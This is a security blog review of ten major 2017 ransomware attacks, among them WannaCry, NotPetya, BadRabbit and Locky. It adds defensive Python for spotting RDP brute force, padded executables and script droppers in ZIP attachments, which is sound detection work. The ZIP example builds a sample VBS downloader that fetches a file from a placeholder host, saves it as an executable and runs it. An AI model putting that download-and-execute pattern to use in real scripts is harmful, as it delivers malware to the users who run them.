Ransomware had a good year in 2017. For the first time ever, we saw several “cryptoworm” variants self-propagate across vulnerable workstations around the world. We also witnessed more traditional ransomware families cause remarkable damage to victimized organizations as well as strains that embraced novel tools and techniques.
Here are 10 of the most significant ransomware attacks from the past year. (For the purposes of this article, “most significant” does not account only for the number of users affected. It also takes into account other factors such as distribution, costs, updates, and potential damages for future victims.)
On 26 July 2017, Arkansas Oral & Facial Surgery Center was hit by a ransomware strain it could not identify. The attack did not touch its patient database, but it did encrypt imaging files such as X-rays along with other documents, including email attachments, and it left the records of appointments from the three weeks before the attack unreadable.
When the practice finished its assessment in September 2017, it still could not determine whether the attackers had accessed any patients' personal or medical data. It therefore chose to notify 128,000 patients and offered each of them a year of free credit monitoring. That is the usual outcome when an organization cannot prove what an intruder touched: it has to assume the worst, and the notification bill follows from that assumption rather than from the encryption itself.
Emsisoft security researcher xXToffeeXx detected a new ransomware threat called Reyptson back in July 2017. Upon successful infection, Reyptson checks to see if Mozilla’s Thunderbird email client is installed on the computer. If it is, the ransomware attempts to read the victim’s email credentials and contact list.
The threat isn’t interested in viewing this data to compromise the victim’s privacy. Instead it leverages those contacts to conduct a spam distribution campaign from the victim’s computer. Each of those spam messages comes with a fake invoice document that contains an executable responsible for loading up the ransomware.
McAfee’s research team detected “Android/Ransom.LeakerLocker.A!Pkg,” also known as LeakerLocker, back in July 2017. They found it hiding inside of two Android applications: Booster & Cleaner Pro, an app which had 5,000 installs at the time of discovery, and Wallpapers Blur HD, a program with 10,000 installs.
LeakerLocker doesn't encrypt anything on the infected device. Instead it locks the home screen and claims to have harvested the device's email addresses, contacts, Chrome history, text messages and call logs, pictures, and device information. It then shows some of that information in a WebView and demands $50 to stop the data being shared with everyone in the victim's contact list. With no encryption involved, the extortion lever is the leak threat alone, and the victim's belief that the data was taken matters more to the scheme than how much of it the malware really held.
In April 2017, Panda Security's researchers discovered a new ransomware that they nicknamed "What You See Is What You Encrypt," or "WYSIWYE." The malware comes with an interface the attacker uses to configure preferences, including the email address that appears in the ransom note left for the victim. From that interface the operator can also pick particular network computers to attack, target specific files, and run in stealth mode.
WYSIWYE reaches a computer through a brute-force attack on Remote Desktop Protocol (RDP). The pattern is now routine: attackers scan the internet for hosts exposing RDP, then point a tool at each one that tries hundreds of thousands of username and password combinations until one works. With a valid credential in hand, they log in over RDP and deploy WYSIWYE onto the chosen machine by hand. The defensive corollary is just as routine: don't expose RDP directly to the internet, enforce account lockout and multi-factor authentication on remote access, and alert on bursts of failed logons from a single source.
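What an alert for that kind of guessing looks like in practice, as an added example that is not code from the original article or from Panda Security: the script below runs over a constructed list of simplified Windows Security log events (event 4625 = failed logon, 4624 = successful logon, logon type 10 = RemoteInteractive, i.e. RDP) and flags any source address that piles up a burst of failures inside a sliding time window, escalating if a successful logon from that address follows the burst. The event format, the threshold, the window and the IP addresses are all assumptions made for the illustration.

```python
"""Sliding-window detector for RDP brute-force bursts in Windows logon events.

Added example, not from the original article. Input events are a
constructed, simplified rendering of Security log records:
    "<ISO timestamp> <EventID> <LogonType> <SourceIP> <TargetUser>"
Event 4625 = failed logon, 4624 = successful logon; logon type 10 is
RemoteInteractive (RDP). Format, thresholds and addresses are assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED_LOGON = "4625"
SUCCESS_LOGON = "4624"
# Type 10 is classic RDP; with Network Level Authentication a failed RDP
# attempt is frequently logged as type 3 instead, so watch both.
RDP_LOGON_TYPES = {"10", "3"}


def parse_event(line):
    ts, event_id, logon_type, src_ip, user = line.split()
    return datetime.fromisoformat(ts), event_id, logon_type, src_ip, user


def detect_rdp_bruteforce(lines, threshold=20, window=timedelta(minutes=5)):
    """Return {src_ip: info} for sources with >= threshold failed RDP logons
    inside `window`. info holds the peak in-window failure count, the set of
    usernames tried, and whether a successful logon followed the burst."""
    failures = defaultdict(deque)   # src_ip -> timestamps of recent failures
    users_tried = defaultdict(set)  # src_ip -> usernames seen in failures
    alerts = {}
    for line in sorted(lines):      # ISO timestamps sort lexically
        ts, event_id, logon_type, src_ip, user = parse_event(line)
        if logon_type not in RDP_LOGON_TYPES:
            continue
        recent = failures[src_ip]
        while recent and ts - recent[0] > window:   # expire old failures
            recent.popleft()
        if event_id == FAILED_LOGON:
            recent.append(ts)
            users_tried[src_ip].add(user)
            if len(recent) >= threshold:
                info = alerts.setdefault(src_ip, {
                    "failures": 0, "users": users_tried[src_ip],
                    "success_after_burst": False, "compromised_user": None})
                info["failures"] = max(info["failures"], len(recent))
        elif event_id == SUCCESS_LOGON and src_ip in alerts:
            # A success from a source already flagged: the guessing worked.
            alerts[src_ip]["success_after_burst"] = True
            alerts[src_ip]["compromised_user"] = user
    return alerts


# Constructed sample: 25 failures from one address in under a minute, cycling
# through common account names, followed by a success; plus one legitimate
# user who mistypes a password once and then logs in.
SAMPLE_EVENTS = [
    f"2017-04-03T02:10:{i:02d} 4625 10 203.0.113.7 {u}"
    for i, u in enumerate(["administrator", "admin", "backup", "scanner", "user"] * 5)
] + [
    "2017-04-03T02:12:30 4624 10 203.0.113.7 backup",
    "2017-04-03T08:00:00 4625 10 192.0.2.44 jsmith",
    "2017-04-03T08:00:20 4624 10 192.0.2.44 jsmith",
]

if __name__ == "__main__":
    for ip, info in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(ip, info)
```

The "success after burst" flag is the one worth paging someone for: a burst alone may be an internet scanner that lockout already absorbed, but a success from the same source means a credential is now in the attacker's hands and the host should be treated as compromised until the session is reviewed.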
On 12 December 2016, the Cockrell Hill Police Department in Dallas, Texas learned that malware had infected one of its servers. The infection, which the department contained to that single server, began when an employee opened spam that arrived from an address spoofing a department-issued email address.
The department traced the infection to a virus it called "Osiris," most likely the Locky variant that appended the .osiris extension to the files it encrypted. Osiris encrypted Microsoft Word and Excel documents as well as all body-camera video, some in-car video, some in-house surveillance video, and some photographs dating back to 2009, then demanded 4,000 USD in Bitcoin. The department recovered the documents from CDs and DVDs, but because it had no comprehensive backups, the affected video and photographs were lost for good.
Cerber is one of the heavy-hitters in the ransomware sphere. It’s also one of the most prolific crypto-malware threats. Indeed, Microsoft detected more enterprise PCs infected with Cerber than any other ransomware family over the 2016-17 holiday season.
Bad actors have continued to outfit Cerber with new tactics and techniques. Malwarebytes observed one such modification in August 2017 in a campaign that begins with the Magnitude exploit kit. After successfully exploiting a vulnerability in the victim's browser or one of its plugins, Magnitude loads a Cerber variant padded with junk data to inflate its size, a trick that sidesteps the file-size ceiling many security products apply before they bother to scan a binary.
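A quick way to triage that trick, as an added example that is not code from Malwarebytes' analysis or from the original article: junk appended to a Windows executable lands in the PE "overlay," the bytes after the end of the last section, so measuring the overlay against the file size separates a padded sample from a normally built one. The script below parses just enough of the PE headers to do that, and builds a constructed, non-executable PE-shaped blob to exercise the parser; the thresholds are assumptions.

```python
"""Triage check for padded PE binaries: how much data sits past the last section.

Added example, not from Malwarebytes' analysis or the original article.
A scanner that skips files above a size ceiling can be sidestepped by
appending junk; that junk lands in the PE "overlay" (bytes after the end
of the last section). This parses just enough of the PE headers to
measure the overlay. Thresholds and the sample file are constructed.
"""
import struct


def pe_overlay_size(data):
    """Bytes after the end of the last section's raw data (0 if none)."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections, = struct.unpack_from("<H", data, e_lfanew + 6)
    size_opt_hdr, = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + size_opt_hdr          # first IMAGE_SECTION_HEADER
    end_of_sections = table + 40 * num_sections  # never earlier than the table itself
    for i in range(num_sections):
        # SizeOfRawData at +16 and PointerToRawData at +20 within each 40-byte header
        size_raw, ptr_raw = struct.unpack_from("<II", data, table + 40 * i + 16)
        end_of_sections = max(end_of_sections, ptr_raw + size_raw)
    return max(0, len(data) - end_of_sections)


def looks_padded(data, min_overlay=1_000_000, min_ratio=0.5):
    """True when the overlay is both large in absolute terms and dominates the file."""
    overlay = pe_overlay_size(data)
    return overlay >= min_overlay and overlay / len(data) >= min_ratio


def build_sample_pe(section_bytes, overlay):
    """Construct a minimal PE-shaped blob (DOS stub, COFF header, zeroed optional
    header, one section, then the overlay). It is not executable; it exists only
    to exercise the parser."""
    e_lfanew = 0x80
    dos = bytearray(b"MZ").ljust(e_lfanew, b"\0")
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    size_opt_hdr = 0xE0                               # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, size_opt_hdr, 0x0102)
    ptr_raw = 0x200
    section = b".text".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", len(section_bytes), 0x1000, len(section_bytes),
        ptr_raw, 0, 0, 0, 0, 0x60000020)
    header = (dos + b"PE\0\0" + coff + bytes(size_opt_hdr) + section).ljust(ptr_raw, b"\0")
    return bytes(header) + section_bytes + overlay


# Constructed samples: a 4 KiB "program" alone, and the same with 2 MB of junk appended.
PLAIN_SAMPLE = build_sample_pe(b"\xCC" * 4096, b"")
PADDED_SAMPLE = build_sample_pe(b"\xCC" * 4096, b"\0" * 2_000_000)

if __name__ == "__main__":
    for name, blob in (("plain", PLAIN_SAMPLE), ("padded", PADDED_SAMPLE)):
        print(name, len(blob), "bytes, overlay", pe_overlay_size(blob),
              "bytes, padded:", looks_padded(blob))
```

Treat the result as a triage signal rather than a verdict: self-extracting installers and some signed binaries legitimately carry large overlays, and padding only helps an attacker against products that actually impose a size ceiling. The useful operational response is to make sure your own scanner's ceiling is known and, where possible, lifted for executables.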
Since its discovery in February 2016, Locky and its ever-multiplying variants have relied on spam botnets such as Necurs for distribution. The crypto-ransomware went dark in early 2017, but it resurfaced in August with one of its largest campaigns yet: 23 million spam messages sent out over a 24-hour period.
AppRiver, which detected the operation, reported emails with subject lines such as "pictures" and "documents" and a body asking the recipient to "download it here." Each email carried a ZIP attachment containing a Visual Basic Script (VBS) file, and that script, when run, pulled down Locky. The chain is worth noting for defenders: the archive exists only to get a script past attachment filters that would block a bare .vbs or .exe, so the filter has to look inside it.
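What looking inside the archive amounts to, as an added example that is not code from the original article or from AppRiver: the script below opens a ZIP attachment in memory, flags script or executable members, double extensions such as "pictures.jpg.vbs", and nested archives, and greps small script members for the three traits every VBS downloader needs (an HTTP client, a file writer, and a way to execute the result). The ZIP, the script inside it and the pattern list are constructed here; the patterns are generic, not indicators from any specific Locky sample.

```python
"""Inspect a ZIP email attachment for script droppers of the kind this campaign used.

Added example, not from the original article or from AppRiver. The ZIP and
the script inside it are constructed here; the "downloader" patterns are
generic strings seen in many VBS/JScript downloaders, not indicators taken
from any specific Locky sample.
"""
import io
import re
import zipfile

SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta",
               ".ps1", ".bat", ".cmd", ".scr", ".exe", ".lnk"}
ARCHIVE_EXTS = {".zip", ".7z", ".rar"}
DOWNLOADER_PATTERNS = {
    "http client": re.compile(rb"msxml2\.(server)?xmlhttp|winhttp\.winhttprequest", re.I),
    "file writer": re.compile(rb"adodb\.stream", re.I),
    "exec":        re.compile(rb"wscript\.shell|shell\.application", re.I),
}
MAX_SCAN_BYTES = 1_000_000   # don't inflate a huge member just to grep it


def member_extensions(name):
    """All extensions on a member name: "invoice.pdf.vbs" -> ['.pdf', '.vbs']."""
    base = name.rsplit("/", 1)[-1].lower()
    return ["." + p for p in base.split(".")[1:]]


def inspect_zip_attachment(data, max_members=50):
    """Return a list of findings (empty means nothing suspicious was seen)."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid zip archive"]
    with zf:
        infos = zf.infolist()
        if len(infos) > max_members:
            findings.append(f"unusually many members: {len(infos)}")
        for info in infos:
            exts = member_extensions(info.filename)
            if not exts:
                continue
            if exts[-1] in ARCHIVE_EXTS:
                findings.append(f"nested archive: {info.filename}")
            elif exts[-1] in SCRIPT_EXTS:
                findings.append(f"script or executable member: {info.filename}")
                if len(exts) > 1:   # "pictures.jpg.vbs" poses as a picture
                    findings.append(f"double extension: {info.filename}")
                if info.file_size <= MAX_SCAN_BYTES:
                    content = zf.read(info)
                    hits = [k for k, p in DOWNLOADER_PATTERNS.items() if p.search(content)]
                    if hits:
                        findings.append(f"downloader traits in {info.filename}: {', '.join(hits)}")
    return findings


def build_sample_attachment(malicious=True):
    """Constructed stand-in for the campaign's attachment. The malicious flavour
    holds a VBS showing the three traits above (pointing at an .invalid host);
    the benign one holds a plain text note."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        if malicious:
            zf.writestr("pictures.jpg.vbs",
                        'Set h = CreateObject("MSXML2.XMLHTTP")\r\n'
                        'h.Open "GET", "http://example.invalid/p", False: h.Send\r\n'
                        'Set s = CreateObject("ADODB.Stream"): s.Type = 1: s.Open\r\n'
                        's.Write h.ResponseBody: s.SaveToFile "p.exe", 2\r\n'
                        'CreateObject("WScript.Shell").Run "p.exe"\r\n')
        else:
            zf.writestr("pictures/notes.txt", "holiday snaps, see shared drive\n")
    return buf.getvalue()


if __name__ == "__main__":
    for flavour in (True, False):
        print("malicious" if flavour else "benign",
              inspect_zip_attachment(build_sample_attachment(flavour)))
```

On a mail gateway the extension checks alone would have stopped this campaign's attachment; the content patterns are there for the variants that rename the script to something harmless and rely on the user to open it. Both checks are cheap, and neither needs a signature for the specific sample.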
A week before Halloween, Kaspersky Lab revealed it had received “notifications of mass alerts” of a new ransomware targeting Ukrainian and Russian organizations. Some of the victims included Russian news media outlets Fontanka.ru and Interfax as well as Kiev’s metro system and an airport in Odessa. ESET researchers believe the ransomware also hit targets in Poland, South Korea, and the United States.
Kaspersky's researchers ultimately identified the threat as BadRabbit. Unlike WannaCry and NotPetya, BadRabbit did not rely on the EternalBlue exploit to get in. Its initial access came from drive-by downloads, a fake Adobe Flash Player update served from compromised websites, that delivered the ransomware dropper; once inside a network it spread over SMB using harvested and hard-coded credentials (later analyses also found it used the related EternalRomance exploit). It was a much smaller operation, demanding 0.05 Bitcoin from hundreds, not hundreds of thousands, of victims.
News of NotPetya first broke on 27 June when power distributors in Ukraine and the Netherlands confirmed attacks that had affected their systems. Not long afterwards, Ukraine's government, the offices of multinationals in Spain, and the British advertising group WPP confirmed similar incidents. Researchers initially traced the attacks to Petya, a ransomware family that overwrites the Master Boot Record with its own loader and encrypts the Master File Table so the machine can no longer boot. They also observed that the new variant spread using EternalBlue, the same exploit for the SMBv1 flaw (MS17-010) that WannaCry had used.
A closer look by Kaspersky Lab, however, showed that Petya proper wasn't involved. The responsible malware borrowed large chunks of Petya's code, but it behaved as a wiper: the "installation key" shown in its ransom note was random data rather than anything derived from the encryption key, so even the attackers could not have produced a decryptor, and paying was pointless. For that reason the threat came to be known as "NotPetya" (Kaspersky itself used the name ExPetr).
On 12 May 2017, an updated version of the WCry/WannaCry ransomware calling itself "WanaCrypt0r 2.0" struck hospitals belonging to the United Kingdom's National Health Service (NHS), the Spanish telecommunications company Telefónica, and other high-profile targets around the world. Each victim received a note demanding $300 in Bitcoin. As with other ransomware, paying the WannaCry attackers didn't guarantee that a victim would receive a decryption key for their files.
Researchers later determined that WannaCry spread by exploiting EternalBlue, an exploit for an SMBv1 flaw that Microsoft had patched in security bulletin MS17-010 in March 2017, two months before the outbreak. EternalBlue found its way into WannaCry's delivery mechanism after a group calling itself the Shadow Brokers dumped it, along with other exploit code attributed to the Equation Group, onto the public web in April 2017. In total, WannaCry infected more than 300,000 computers worldwide, almost all of them machines that had not applied a patch that was already two months old.
SECURITY CONTROLS TO THE RESCUE!
In light of the attacks discussed above, it’s important that organizations everywhere make a resolution to strengthen their ransomware defenses in 2018. That decision should include implementing security controls. In particular, they should abide by CIS Control 10 and invest in data recovery capabilities such as reliable backups.
To learn how Tripwire’s products help promote CIS Control 10 and the Center for Internet Security’s 19 other critical security controls (CSCs), click here.